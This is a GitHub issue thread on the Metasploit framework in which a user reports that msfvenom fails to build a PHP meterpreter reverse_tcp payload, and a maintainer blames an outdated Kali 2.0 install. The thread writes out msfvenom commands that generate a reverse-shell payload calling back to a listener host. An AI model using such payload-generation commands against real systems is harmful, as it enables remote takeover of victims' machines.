### ISSUE TITLE
Msfvenom fail to create a php/meterpreter/reverse

### ISSUE THREAD

**Issue by islamTaha12** [rapid7/metasploit-framework#6974]
/usr/share/metasploit-framework# ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.55 LPORT=1337 R > /root/Desktop/1769.php

No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

**Comment by bcook-r7** [comment]
what is the 'R' for? I think you should omit it, or use '-f raw'

**Comment by islamTaha12** [comment]
The same result

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.55 LPORT=1337 -f raw  > /root/Desktop/1769.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

**Comment by bcook-r7** [comment]
is this Kali linux? if so, what version.

you should probably be using the bin stub wrappers for it as well, rather than running the commands directly from /usr/share

**Comment by islamTaha12** [comment]
ya its kali 2 .. and both are producing the same error
![screenshot from 2016-06-14 17-21-07](https://cloud.githubusercontent.com/assets/17981089/16048484/f0be6a38-325c-11e6-9fba-d6ddd6f314b9.png)
![screenshot from 2016-06-14 17-21-32](https://cloud.githubusercontent.com/assets/17981089/16048485/f0c0d5d4-325c-11e6-89a9-74a7d14a61d1.png)

**Comment by bcook-r7** [comment]
can you show what version of metasploit-framework you are running? IIRC Kali 2.0 has a very out-of-date version. You should be using Kali-rolling now.

**Comment by islamTaha12** [comment]
I tried to get msfconsole -version to get my running version .. but I didn't get it. Can u please guide me?

**Comment by islamTaha12** [comment]
metasploit v4.11.5-2016010401   
Here is mine

**Comment by bcook-r7** [comment]
Ah. sorry, kali-2.0 is not supported any more. Please upgrade to kali-rolling to fix this.

**Comment by islamTaha12** [comment]
I will upgrade and back to you .. Thanks for your fast response
